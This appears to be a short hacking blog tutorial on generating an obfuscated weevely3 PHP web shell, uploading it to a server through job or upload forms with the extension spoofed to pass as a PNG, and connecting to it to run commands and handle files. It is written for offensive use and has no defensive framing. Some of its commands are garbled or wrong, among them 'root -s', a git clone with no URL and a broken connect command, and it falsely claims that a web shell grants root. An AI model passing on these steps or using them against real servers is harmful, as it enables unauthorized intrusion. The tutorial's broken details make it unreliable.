How to Upload a Shell onto a Server

How to Upload a Shell onto a Server

Hello guys

Today you will learn How to Upload a Shell onto a Server


Essentially, this’ll allow you root privileges within a server.



For the sake of just making everything simpler, please provide yourself with permanent root privileges in the terminal via;

root -s

Generating the malware


• Download weevely3;

git clone

If you don’t have “git clone”;

apt-get install git

Should have generated a folder called, “weevely3” – should look like this:


Now that weevely3 is downloaded, we have to generate the payload


• But first, let’s grab the dependencies;


You may do so by typing in the following commands;

apt-get install g++ python-pip libyaml-dev python-dev
pip install prettytable Mako pyaml dateutils --upgrade
apt-get update

• Now, see if it works…

cd ~/(directory)/weevely3

If it generates the following output, you’ve done good;


• Generating the payload;

python generate [password] [path]

For example;

python generate iLikePie ~/Desktop/shell.php

Something interesting it does is obfuscate the code; making it more stealthy

Uploading the malicious code


This is something you’ll have to figure out on your own since I don’t have anything to test it on, legally speaking (im actually just incredibly lazy). However, I would suggest looking for “job forms” or “upload forms”, in which you’d be able to upload the malicious code.


Also, I’d suggest using BurpSuit to spoof the extension confusing the server, making it think it’s a — let’s say — PNG file.


Connecting to the shell


Now that you’ve placed the shell within their system, it’s time to connect to it. Do it by;

python [url] [password]


python iLikePie

From here, you’d have root privileges of the server; you’d be able to execute code, delete/replace/download files, etc.




Leave a Reply